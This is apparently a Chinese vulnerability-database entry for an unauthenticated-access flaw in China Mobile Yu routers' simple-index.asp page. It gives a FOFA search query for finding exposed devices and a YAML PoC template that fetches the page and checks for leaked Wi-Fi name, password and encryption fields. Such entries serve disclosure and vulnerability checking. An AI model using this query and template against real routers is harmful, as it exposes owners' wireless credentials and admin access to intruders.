china-mobile-simple-index-asp-unauth: 中移动禹路由器 simple-index.asp 未授权漏洞

日期: 2025-09-01 | 影响软件: 中移动禹路由器 | POC: 已公开

漏洞描述

中移禹路由器simple-index.asp处存在未授权漏洞,攻击者可以获取后台权限。 fofa:title="互联世界 物联未来-登录"

PoC代码[已公开]

id: china-mobile-simple-index-asp-unauth

info:
  name: 中移动禹路由器 simple-index.asp 未授权漏洞
  author: zan8in
  severity: high
  verified: true
  description: |
    中移禹路由器simple-index.asp处存在未授权漏洞,攻击者可以获取后台权限。
    fofa:title="互联世界 物联未来-登录"
  reference:
    - https://mp.weixin.qq.com/s/nKwgNzSdV6a614IH0IbsLg
  created: 2023/05/26

rules:
  r0:
    request:
      method: GET
      path: /simple-index.asp
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'无线密码 ') &&
      response.body.bcontains(b'加密模式 ') &&
      response.body.bcontains(b'无线名称 ')
expression: r0()

相关漏洞推荐